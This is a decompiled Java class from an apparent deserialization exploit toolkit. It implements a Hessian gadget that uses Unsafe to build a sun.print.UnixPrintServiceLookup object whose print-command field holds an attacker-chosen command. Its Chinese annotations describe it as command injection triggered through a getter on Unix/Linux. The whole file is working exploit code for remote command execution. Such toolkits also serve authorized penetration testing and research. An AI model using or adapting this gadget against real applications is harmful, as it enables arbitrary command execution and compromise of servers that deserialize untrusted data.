package com.ar3h.chains.gadget.impl.hessian.jdk;

import com.ar3h.chains.common.Gadget;
import com.ar3h.chains.common.GadgetChain;
import com.ar3h.chains.common.GadgetContext;
import com.ar3h.chains.common.Tag;
import com.ar3h.chains.common.annotations.GadgetAnnotation;
import com.ar3h.chains.common.annotations.GadgetTags;
import com.ar3h.chains.common.param.Param;
import com.ar3h.chains.common.util.OSUtil;
import com.ar3h.chains.common.util.Reflections;
import java.lang.reflect.Field;
import org.osgi.framework.Constants;
import sun.misc.Unsafe;

@GadgetAnnotation(name = "UnixPrintServiceLookup 命令注入", description = "该类未实现 Serializable，只适用于Hessian反序列化 并且只适用于unix/linux\njdk高版本移除此类\n通过getter方法触发命令注入\n本地测试 zulu8u345 不存在此类", dependencies = {"linux"})
@GadgetTags(tags = {Tag.UnixPrintServiceChain, Tag.HessianGetter, Tag.Getter, Tag.NotForJavaSerializable, Tag.END})
/* loaded from: input_file:BOOT-INF/lib/chains-core-1.4.1.jar:com/ar3h/chains/gadget/impl/hessian/jdk/UnixPrintServiceLookup.class */
public class UnixPrintServiceLookup implements Gadget {

    @Param(name = "命令")
    String cmd;

    public Object getObject() throws Exception {
        if (OSUtil.isWindows()) {
            throw new RuntimeException("UnixPrintServiceLookup 利用链仅在 Unix/Linux 系统中可用");
        }
        Field declaredField = Unsafe.class.getDeclaredField("theUnsafe");
        declaredField.setAccessible(true);
        Object allocateInstance = ((Unsafe) declaredField.get(null)).allocateInstance(Class.forName("sun.print.UnixPrintServiceLookup"));
        Reflections.setFieldValue(allocateInstance, "cmdIndex", 0);
        Reflections.setFieldValue(allocateInstance, Constants.BUNDLE_NATIVECODE_OSNAME, "xx");
        Reflections.setFieldValue(allocateInstance, "lpcFirstCom", new String[]{this.cmd, this.cmd, this.cmd});
        return allocateInstance;
    }

    @Override // com.ar3h.chains.common.Gadget
    public Object invoke(GadgetContext gadgetContext, GadgetChain gadgetChain) throws Exception {
        return getObject();
    }
}
